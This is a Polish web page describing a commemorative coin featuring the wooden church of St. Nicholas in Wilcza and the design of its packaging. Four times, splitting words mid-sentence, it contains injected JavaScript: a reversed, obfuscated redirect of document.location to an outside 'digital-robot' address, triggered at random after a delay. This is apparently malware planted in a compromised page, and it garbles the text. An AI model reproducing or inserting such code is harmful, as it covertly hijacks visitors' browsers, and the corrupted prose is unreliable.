Drewniany Kościół Św. Mikołaja w Wilczy

Nasze najnowsze wydawnictwo tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to okolicznościowy numizmat z wizerunkiem drewnianego kościoła w Wilczej i herbem przyjaznej gminy Pilchowice.

Grafika opakowania numizmatu oparta jest na kreacji dziennika podróży wykonanego przez podróżnika/kronikarza, który odwiedza cenne, zabytkowe miejsca opisując je skrzętnie za pomocą fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tografii, rysunków i notatek. Całość umieszczona na fakturze drewna wpisuje się w naturalny klimat kościoła. Na rzucie kościoła zaznaczone zostały miejsca, w których występują najważniejsze elementy wnętrza kościoła czyli obrazy, ołtarz główny oraz przyporządkowane do nich fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tografie tych lokacji. Na opakowaniu znalazła się również ciekawa histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toria kościoła.